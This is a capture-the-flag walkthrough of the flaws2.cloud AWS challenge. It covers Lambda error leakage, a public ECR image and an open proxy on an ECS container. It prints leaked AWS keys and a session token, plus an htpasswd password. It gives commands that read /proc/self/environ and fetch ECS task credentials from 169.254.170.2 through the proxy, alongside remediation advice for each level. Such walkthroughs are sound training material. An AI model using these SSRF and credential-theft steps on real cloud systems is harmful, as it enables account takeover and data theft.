Exploiting AWS 2 - Attacker's Perspective (Flaws2.Cloud)

In this path as an attacker, you’ll exploit your way through misconfigurations in Lambda (serverless functions) and containers in ECS Fargate.

This is a walkthrough of the flaws2.cloud challenge, which focuses on AWS-specific issues, so there are no buffer overflows, XSS, etc. You can play hands-on at the keyboard, or just click through the hints to learn the concepts and move from one level to the next without playing.

Attacker

Level1



Input Validation

For this level, you’ll need to enter the correct PIN code



Checking the source code shows that input validation is done only in client-side JavaScript, and the code only checks that the value is a number (a float in JS).

<script type="text/javascript">
function validateForm() {
  var code = document.forms["myForm"]["code"].value;
  if (!(!isNaN(parseFloat(code)) && isFinite(code))) {
    alert("Code must be a number");
    return false;
  }
}
</script>

By changing the parameter to something that is not a number, like the letter “a”, and requesting the URL directly, we bypass the JavaScript check and can see the error message the backend throws:

https://2rfismmoo8.execute-api.us-east-1.amazonaws.com/default/level1?code=a



The result is an error based on the malformed input...an error that gives us a ton of data we should not have access to.

Let’s copy this data and use an online JSON formatter to make it look more appealing. FROM:

{"AWS_LAMBDA_FUNCTION_NAME":"level1","_AWS_XRAY_DAEMON_ADDRESS":"169.254.79.129","PATH":"/var/lang/bin:/usr/local/bin:/usr/bin/:/bin:/opt/bin","AWS_XRAY_DAEMON_ADDRESS":"169.254.79.129:2000","AWS_EXECUTION_ENV":"AWS_Lambda_nodejs8.10","AWS_LAMBDA_FUNCTION_VERSION":"$LATEST","AWS_LAMBDA_RUNTIME_API":"127.0.0.1:9001","AWS_XRAY_CONTEXT_MISSING":"LOG_ERROR","AWS_SESSION_TOKEN":"IQoJb3JpZ2luX2VjEAMaCXVzLWVhc3QtMSJHMEUCIHLzqsw+G1kQlxALmUXcNPdCuD35xoHEV/50FeF3A/90AiEA7YmWJjdzbnCU/GpjUhm7Hj6pMy+z1YYSoXleJq1GLoUqlAIIzP//////////ARADGgw2NTM3MTEzMzE3ODgiDMpofLBKCsA11AEwvSroAUuxmVgoSWhAT22O8LPNzeZG+qjvetLU7K/p2f3i0jwjA6Tcj48um2soe9Sbz4JLIClYaasx2fPz1B8eDiebiGCGevLLAfleE6GgXQUk+Ba/77lfK7L/4dydIgTnBE+8hY3g6BlOj70nrOJz0q+d2D7uX/Bm9WC5MuA5heupr8lUkR+3VDE3imWVXZilHOlTo5yiyA6bzG6MVxn+nd+7yRYsOeCxBlzAIwdb98qsKU32WTS7DpHsfSBb0Nu2GQ2gTW1lT6auEZaHq0XWSydn9yYPNfN4xPv0utZwbyqO3QIao8orwrt5p24w8+TckwY6mgEUfCjb7EAhkm57pMdvC/7pIh8pZbEBrFJdHzbTcLLIgMqu6EdBkOO8iuh2GGtE5mWJMfIAsoN8OS/VNaFMcJbGzO5Lb9hrRb68rPynNTL1YtGowxWqIYyjhD+52prkoB57v0yfTQ35amZJkPIAswGGTG8IwUEdJfNGrzQ3UgdhS0xOZu9pu07rKjnLTXdRAJknl3sBQq0Wccqy","AWS_LAMBDA_LOG_STREAM_NAME":"2022/05/08/[$LATEST]69ea1cc0496f43e28d566d96ebeb4ca1","TZ":":UTC","AWS_DEFAULT_REGION":"us-east-1","LANG":"en_US.UTF-8","LD_LIBRARY_PATH":"/var/lang/lib:/lib64:/usr/lib64:/var/runtime:/var/runtime/lib:/var/task:/var/task/lib:/opt/lib","AWS_LAMBDA_LOG_GROUP_NAME":"/aws/lambda/level1","_HANDLER":"index.handler","AWS_LAMBDA_FUNCTION_MEMORY_SIZE":"128","_AWS_XRAY_DAEMON_PORT":"2000","AWS_LAMBDA_INITIALIZATION_TYPE":"on-demand","AWS_ACCESS_KEY_ID":"ASIAZQNB3KHGFPJY5DPJ","AWS_SECRET_ACCESS_KEY":"gjy5GEP0krqiDbrMI2q2EtlWA2t7FHnAfNMRw2On","LAMBDA_TASK_ROOT":"/var/task","LAMBDA_RUNTIME_DIR":"/var/runtime","AWS_REGION":"us-east-1","NODE_PATH":"/opt/nodejs/node8/node_modules:/opt/nodejs/node_modules:/var/runtime/node_modules:/var/runtime:/var/task:/var/runtime/node_modules","_X_AMZN_TRACE_ID":"Root=1-627732ad-53c34cb3387b64d3292699ad;Parent=4be46de117eaaca9;Sampled=0"}

TO:

{

"AWS_LAMBDA_FUNCTION_NAME": "level1",

"_AWS_XRAY_DAEMON_ADDRESS": "169.254.79.129",

"PATH": "/var/lang/bin:/usr/local/bin:/usr/bin/:/bin:/opt/bin",

"AWS_XRAY_DAEMON_ADDRESS": "169.254.79.129:2000",

"AWS_EXECUTION_ENV": "AWS_Lambda_nodejs8.10",

"AWS_LAMBDA_FUNCTION_VERSION": "$LATEST",

"AWS_LAMBDA_RUNTIME_API": "127.0.0.1:9001",

"AWS_XRAY_CONTEXT_MISSING": "LOG_ERROR",

"AWS_SESSION_TOKEN": "IQoJb3JpZ2luX2VjEAMaCXVzLWVhc3QtMSJHMEUCIHLzqsw+G1kQlxALmUXcNPdCuD35xoHEV/50FeF3A/90AiEA7YmWJjdzbnCU/GpjUhm7Hj6pMy+z1YYSoXleJq1GLoUqlAIIzP//////////ARADGgw2NTM3MTEzMzE3ODgiDMpofLBKCsA11AEwvSroAUuxmVgoSWhAT22O8LPNzeZG+qjvetLU7K/p2f3i0jwjA6Tcj48um2soe9Sbz4JLIClYaasx2fPz1B8eDiebiGCGevLLAfleE6GgXQUk+Ba/77lfK7L/4dydIgTnBE+8hY3g6BlOj70nrOJz0q+d2D7uX/Bm9WC5MuA5heupr8lUkR+3VDE3imWVXZilHOlTo5yiyA6bzG6MVxn+nd+7yRYsOeCxBlzAIwdb98qsKU32WTS7DpHsfSBb0Nu2GQ2gTW1lT6auEZaHq0XWSydn9yYPNfN4xPv0utZwbyqO3QIao8orwrt5p24w8+TckwY6mgEUfCjb7EAhkm57pMdvC/7pIh8pZbEBrFJdHzbTcLLIgMqu6EdBkOO8iuh2GGtE5mWJMfIAsoN8OS/VNaFMcJbGzO5Lb9hrRb68rPynNTL1YtGowxWqIYyjhD+52prkoB57v0yfTQ35amZJkPIAswGGTG8IwUEdJfNGrzQ3UgdhS0xOZu9pu07rKjnLTXdRAJknl3sBQq0Wccqy",

"AWS_LAMBDA_LOG_STREAM_NAME": "2022/05/08/[$LATEST]69ea1cc0496f43e28d566d96ebeb4ca1",

"TZ": ":UTC",

"AWS_DEFAULT_REGION": "us-east-1",

"LANG": "en_US.UTF-8",

"LD_LIBRARY_PATH": "/var/lang/lib:/lib64:/usr/lib64:/var/runtime:/var/runtime/lib:/var/task:/var/task/lib:/opt/lib",

"AWS_LAMBDA_LOG_GROUP_NAME": "/aws/lambda/level1",

"_HANDLER": "index.handler",

"AWS_LAMBDA_FUNCTION_MEMORY_SIZE": "128",

"_AWS_XRAY_DAEMON_PORT": "2000",

"AWS_LAMBDA_INITIALIZATION_TYPE": "on-demand",

"AWS_ACCESS_KEY_ID": "ASIAZQNB3KHGFPJY5DPJ",

"AWS_SECRET_ACCESS_KEY": "gjy5GEP0krqiDbrMI2q2EtlWA2t7FHnAfNMRw2On",

"LAMBDA_TASK_ROOT": "/var/task",

"LAMBDA_RUNTIME_DIR": "/var/runtime",

"AWS_REGION": "us-east-1",

"NODE_PATH": "/opt/nodejs/node8/node_modules:/opt/nodejs/node_modules:/var/runtime/node_modules:/var/runtime:/var/task:/var/runtime/node_modules",

"_X_AMZN_TRACE_ID": "Root=1-627732ad-53c34cb3387b64d3292699ad;Parent=4be46de117eaaca9;Sampled=0"

}
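The same formatting can be done locally instead of in an online formatter. The sketch below is a minimal example using only Python's standard `json` module; the function names and the placeholder sample values are assumptions made for illustration, not part of the challenge.

```python
import json

# Keys that hold the temporary credentials in the leaked environment.
CREDENTIAL_KEYS = (
    "AWS_ACCESS_KEY_ID",
    "AWS_SECRET_ACCESS_KEY",
    "AWS_SESSION_TOKEN",
)


def pretty(raw: str) -> str:
    """Re-indent a compact JSON string so it is easier to read."""
    return json.dumps(json.loads(raw), indent=2)


def extract_credentials(raw: str) -> dict:
    """Return only the credential-related keys that are present."""
    env = json.loads(raw)
    return {key: env[key] for key in CREDENTIAL_KEYS if key in env}


if __name__ == "__main__":
    # Placeholder values, not the real leaked ones.
    sample = '{"AWS_REGION":"us-east-1","AWS_ACCESS_KEY_ID":"ASIAEXAMPLE"}'
    print(pretty(sample))
    print(extract_credentials(sample))
```

Filtering down to the three credential keys makes it harder to miss the session token among the other variables.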



As the data above shows, we now have access to several environment variables that happen to be AWS credentials. With these credentials, I can create an AWS profile to get access to the underlying AWS infrastructure.



Then add the AWS session token to the ~/.aws/credentials file, since temporary credentials are not valid without it.




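As a rough illustration of what the resulting profile section looks like, the sketch below renders one from the leaked environment variables. The `render_profile` helper and the placeholder values are hypothetical; the three setting names are the ones the AWS CLI reads from the shared credentials file.

```python
def render_profile(name: str, env: dict) -> str:
    """Build the text of one profile section for ~/.aws/credentials."""
    lines = [
        f"[{name}]",
        f"aws_access_key_id = {env['AWS_ACCESS_KEY_ID']}",
        f"aws_secret_access_key = {env['AWS_SECRET_ACCESS_KEY']}",
        # Temporary (STS) credentials also need the session token.
        f"aws_session_token = {env['AWS_SESSION_TOKEN']}",
    ]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    # Placeholder values; substitute the ones taken from the error output.
    leaked = {
        "AWS_ACCESS_KEY_ID": "ASIAEXAMPLE",
        "AWS_SECRET_ACCESS_KEY": "SECRETEXAMPLE",
        "AWS_SESSION_TOKEN": "TOKENEXAMPLE",
    }
    print(render_profile("havoc", leaked))
```

The printed section can be pasted into the credentials file by hand, which keeps the script from overwriting any existing profiles.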

Use the get-caller-identity API call to view details about the IAM user or role whose credentials we just compromised.

aws sts get-caller-identity --profile havoc


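The account ID needed later sits in the fifth colon-separated field of the returned ARN. A minimal sketch of splitting an ARN follows; the account ID is the one used elsewhere in this walkthrough, while the role and session names in the sample are hypothetical.

```python
def parse_arn(arn: str) -> dict:
    """Split an ARN into its six colon-separated components."""
    parts = arn.split(":", 5)
    if len(parts) != 6 or parts[0] != "arn":
        raise ValueError(f"not an ARN: {arn!r}")
    _, partition, service, region, account, resource = parts
    return {
        "partition": partition,
        "service": service,
        "region": region,  # empty for global services such as STS and IAM
        "account": account,
        "resource": resource,
    }


if __name__ == "__main__":
    # Role and session names below are made up for the example.
    sample = "arn:aws:sts::653711331788:assumed-role/example-role/example-session"
    print(parse_arn(sample)["account"])
```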

These credentials can now be used to list the contents of the bucket this site is running out of:

aws s3 ls s3://level1.flaws2.cloud --profile havoc

Viewing the contents of the secret file in the browser leads you to Level2

Vulnerabilities

- Poor client side input validation + ability to bypass JS

- Lambda functions obtain their credentials from environment variables, which can also store other sensitive information, and the error response exposes all of them.

- The IAM role’s access to S3 is overly permissive for its operational use.

Remediation

- Validate input on the server side; client-side checks can be bypassed.

- Do not return environment variables or other internal details in error responses. Secure environment variables using server-side encryption to protect your data at rest and client-side encryption to protect your data in transit.

- Always use the principle of least privilege when provisioning permissions. Tools like IAM Access Advisor, CloudTracker, and Repokid can help with this.
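To make the first two points concrete, here is a minimal sketch of a handler that validates the PIN on the server and answers bad input with a generic error. It is not the challenge's actual Lambda code; the function names, the length limit, and the response shape are assumptions chosen for illustration.

```python
import json

MAX_PIN_LENGTH = 10  # arbitrary limit chosen for this sketch


def validate_code(raw) -> int:
    """Return the PIN as an int, or raise ValueError for anything else."""
    if not isinstance(raw, str):
        raise ValueError("missing code")
    if not (raw.isascii() and raw.isdigit()) or len(raw) > MAX_PIN_LENGTH:
        raise ValueError("code is not a short run of digits")
    return int(raw)


def handle(params: dict) -> dict:
    """Validate input and never echo internal state back to the caller."""
    try:
        validate_code(params.get("code"))
    except ValueError:
        # Generic message only: no stack trace, no environment dump.
        body = json.dumps({"error": "Code must be a number"})
        return {"statusCode": 400, "body": body}
    # The real PIN comparison would happen here.
    return {"statusCode": 200, "body": json.dumps({"status": "ok"})}


if __name__ == "__main__":
    print(handle({"code": "a"}))
    print(handle({"code": "1234"}))
```

The key design choice is that the error path builds its response from a fixed string, so malformed input cannot cause process state to leak into the reply.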

Level2

Containers

This level is running as a container at http://container.target.flaws2.cloud/. We’re also given a hint that the ECR (Elastic Container Registry) is named “level2”.



With this information we can try to enumerate the ECR by listing the images available. This will utilize the repository name of level2 and the account id observed from enumerating the IAM identity.

This activity can be performed from any AWS account by a user that has ECR privileges, such as AmazonEC2ContainerRegistryFullAccess or AmazonEC2ContainerRegistryReadOnly.



aws ecr list-images --repository-name level2 --registry-id 653711331788 --profile havoc

As observed from the imageDigest parameter, the image is public and can either be downloaded locally and investigated with docker commands or investigated manually with the AWS CLI.
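For the Docker route, the image reference follows ECR's private registry naming pattern of account ID, region, repository, and tag. The helper below is a small sketch of how that reference is assembled; the function name is hypothetical, and the region is assumed to be us-east-1 as seen in the leaked environment.

```python
def image_uri(account_id: str, region: str, repository: str, tag: str = "latest") -> str:
    """Assemble an ECR image reference usable with `docker pull`."""
    return f"{account_id}.dkr.ecr.{region}.amazonaws.com/{repository}:{tag}"


if __name__ == "__main__":
    print(image_uri("653711331788", "us-east-1", "level2"))
```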

USING DOCKER:

# **Download the image locally and inspect the container**

aws ecr get-login



docker pull 653711331788.dkr.ecr.us-east-1.amazonaws.com/level2:latest

docker inspect level2

docker inspect sha256:079aee8a89950717cdccd15b8f17c80e9bc4421a855fcdc120e1c534e4c102e0

Pull the image

Use docker inspect to view detailed information about the container including the last run command.





Use docker history for a more in-depth view of the commands used to actually create the docker image:

docker history 2d73de35b781 --no-trunc



As observed, we get a bunch of commands, but the most important one is

/bin/sh -c htpasswd -b -c /etc/nginx/.htpasswd flaws2 secret_password

which contains the credentials needed to log in to the container at http://container.target.flaws2.cloud/
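Spotting this by eye works for one image, but the same check can be scripted. The sketch below pulls the username and password out of a build command that calls `htpasswd` in batch mode (`-b`), where the password is passed on the command line. The function name is hypothetical, and the parsing only covers the simple argument layout seen here.

```python
import shlex


def htpasswd_credentials(command: str):
    """Return (user, password) if the command runs `htpasswd -b`, else None."""
    tokens = shlex.split(command)
    if "htpasswd" not in tokens:
        return None
    args = tokens[tokens.index("htpasswd") + 1:]
    # Collect single-letter flags such as -b and -c (also combined, e.g. -bc).
    flags = "".join(arg[1:] for arg in args if arg.startswith("-"))
    positional = [arg for arg in args if not arg.startswith("-")]
    # Batch mode layout: htpasswd -b <passwdfile> <username> <password>
    if "b" in flags and len(positional) >= 3:
        return positional[1], positional[2]
    return None


if __name__ == "__main__":
    line = "/bin/sh -c htpasswd -b -c /etc/nginx/.htpasswd flaws2 secret_password"
    print(htpasswd_credentials(line))
```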

USING AWS CLI:

Use the batch-get-image API call to get detailed information for available images without using docker.



aws --profile havoc ecr batch-get-image --repository-name level2 --registry-id 653711331788 --image-ids imageTag=latest | jq '.images[].imageManifest | fromjson'



Next, we use the get-download-url-for-layer API call to retrieve the pre-signed S3 download URL for a given digest from the manifest. In this case I’m using the very first digest observed.

aws --profile havoc ecr get-download-url-for-layer --repository-name level2 --registry-id 653711331788 --layer-digest "sha256:2d73de35b78103fa305bd941424443d520524a050b1e0c78c488646c0f0a0621"



Download the config file from the URL using wget and save the output as “container”.

Viewing the contents of the container file and parsing it with jq, we can observe the command that shows the credentials.
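As an alternative to jq, the downloaded config can be read with a few lines of Python. Docker image config files keep the build steps in a `history` array whose entries carry a `created_by` string; the sketch below lists those strings and filters them by keyword. The function names and the tiny sample config are assumptions for illustration.

```python
import json


def created_by_commands(config_text: str) -> list:
    """Return the build command recorded for each history entry."""
    config = json.loads(config_text)
    return [entry.get("created_by", "") for entry in config.get("history", [])]


def commands_mentioning(config_text: str, keyword: str) -> list:
    """Keep only the build commands that contain the given keyword."""
    return [cmd for cmd in created_by_commands(config_text) if keyword in cmd]


if __name__ == "__main__":
    # Tiny stand-in for the real file saved as "container".
    sample = json.dumps({
        "history": [
            {"created_by": "/bin/sh -c apt-get update"},
            {"created_by": "/bin/sh -c htpasswd -b -c /etc/nginx/.htpasswd flaws2 secret_password"},
        ]
    })
    for command in commands_mentioning(sample, "htpasswd"):
        print(command)
```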

Vulnerabilities

- Publicly accessible container registry.

Remediation

- Avoid making resources publicly accessible if access to them publicly is not necessary for their operation.
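One way to audit for this is to look at the repository policy for `Allow` statements with a wildcard principal. The sketch below works on a policy document supplied as JSON text; the function name and the sample policy are hypothetical, and the check deliberately ignores `Condition` blocks, so a match is a prompt for review rather than proof of public access.

```python
import json


def public_statements(policy_text: str) -> list:
    """Return Allow statements whose Principal includes the wildcard "*"."""
    policy = json.loads(policy_text)
    statements = policy.get("Statement", [])
    if isinstance(statements, dict):  # a single statement may not be wrapped in a list
        statements = [statements]
    found = []
    for statement in statements:
        if statement.get("Effect") != "Allow":
            continue
        principal = statement.get("Principal")
        # Principal is either "*" or a mapping such as {"AWS": "*"} or {"AWS": [...]}.
        values = principal.values() if isinstance(principal, dict) else [principal]
        for value in values:
            items = value if isinstance(value, list) else [value]
            if "*" in items:
                found.append(statement)
                break
    return found


if __name__ == "__main__":
    # Made-up policy for illustration only.
    sample = json.dumps({
        "Version": "2012-10-17",
        "Statement": [{"Effect": "Allow", "Principal": "*", "Action": "ecr:ListImages"}],
    })
    print(len(public_statements(sample)))
```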

Level3

Metadata



The container’s webserver you got access to includes a simple proxy that can be accessed from:

**http://container.target.flaws2.cloud/proxy/http://flaws.cloud**

or **http://container.target.flaws2.cloud/proxy/http://neverssl.com**

Using the hints provided, we’re able to read local files through this proxy, including its environment variables in the **/proc/self/environ** file.

The environment variables include AWS_CONTAINER_CREDENTIALS_RELATIVE_URI, which tells us where the credentials are served. Containers running via ECS on AWS have their credentials at 169.254.170.2/v2/credentials/GUID, where the GUID is found in the AWS_CONTAINER_CREDENTIALS_RELATIVE_URI environment variable.
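Because /proc/self/environ is a run of NUL-separated `KEY=VALUE` entries, the raw proxy output is hard to read. A minimal sketch of parsing it and building the credentials URL follows; the function names are hypothetical, and the sample bytes are a shortened stand-in for the real file.

```python
ECS_CREDENTIALS_HOST = "http://169.254.170.2"


def parse_environ(raw: bytes) -> dict:
    """Turn NUL-separated KEY=VALUE bytes into a dictionary."""
    env = {}
    for entry in raw.split(b"\0"):
        if b"=" not in entry:
            continue  # skips the empty chunk after the final NUL
        key, _, value = entry.partition(b"=")
        env[key.decode(errors="replace")] = value.decode(errors="replace")
    return env


def credentials_url(env: dict) -> str:
    """Join the ECS credentials host with the task's relative URI."""
    # The relative URI already starts with "/", so no extra slash is added.
    return ECS_CREDENTIALS_HOST + env["AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"]


if __name__ == "__main__":
    raw = (
        b"HOME=/root\0"
        b"AWS_CONTAINER_CREDENTIALS_RELATIVE_URI="
        b"/v2/credentials/6d7c28dc-ba85-4e97-aa1d-afef4a6c1f14\0"
    )
    print(credentials_url(parse_environ(raw)))
```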



Using the credentials URI found “/v2/credentials/6d7c28dc-ba85-4e97-aa1d-afef4a6c1f14” we can make a request to the proxy at http://container.target.flaws2.cloud/proxy/http://169.254.170.2//v2/credentials/6d7c28dc-ba85-4e97-aa1d-afef4a6c1f14

curl -s http://container.target.flaws2.cloud/proxy/http://169.254.170.2//v2/credentials/6d7c28dc-ba85-4e97-aa1d-afef4a6c1f14 | jq






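The ECS credentials endpoint answers with a JSON document whose fields include `AccessKeyId`, `SecretAccessKey`, and `Token`. As a sketch, the helper below maps those fields to the environment variable names the AWS CLI understands; the function name and placeholder values are assumptions for illustration.

```python
import json


def to_env(response_text: str) -> dict:
    """Map an ECS task credentials response to AWS CLI environment variables."""
    creds = json.loads(response_text)
    return {
        "AWS_ACCESS_KEY_ID": creds["AccessKeyId"],
        "AWS_SECRET_ACCESS_KEY": creds["SecretAccessKey"],
        "AWS_SESSION_TOKEN": creds["Token"],
    }


if __name__ == "__main__":
    # Placeholder values, not real credentials.
    sample = json.dumps({
        "AccessKeyId": "ASIAEXAMPLE",
        "SecretAccessKey": "SECRETEXAMPLE",
        "Token": "TOKENEXAMPLE",
    })
    for name, value in to_env(sample).items():
        print(f"export {name}={value}")
```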

As always, we can now cause chaos or wreak havoc in this AWS environment. Since we’re dealing with buckets, we can use these credentials to list the buckets and get the final link, which can be found at http://the-end-962b72bjahfm5b4wcktm8t9z4sapemjb.flaws2.cloud/

Vulnerabilities

- Exposed proxy which doesn't restrict access to the container's local files or its credentials endpoint.

Remediation

- Restrict what IAM roles can access as much as possible, following the principle of least privilege.
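On the proxy side, the vulnerability noted above could be narrowed by filtering target URLs before fetching them. The sketch below is one possible filter, not the challenge's code: it allows only http and https, and rejects IP literals in link-local, loopback, or private ranges. The function name is hypothetical, and hostnames are let through without DNS resolution, which a real proxy would also need to check.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = ("http", "https")


def is_allowed(url: str) -> bool:
    """Reject non-HTTP schemes and internal IP literals such as 169.254.170.2."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    try:
        address = ipaddress.ip_address(parts.hostname)
    except ValueError:
        # A hostname rather than an IP literal. This sketch accepts it;
        # a real proxy should also validate the resolved address.
        return True
    return not (address.is_link_local or address.is_loopback or address.is_private)


if __name__ == "__main__":
    for candidate in (
        "http://neverssl.com",
        "file:///proc/self/environ",
        "http://169.254.170.2/v2/credentials/example",
    ):
        print(candidate, is_allowed(candidate))
```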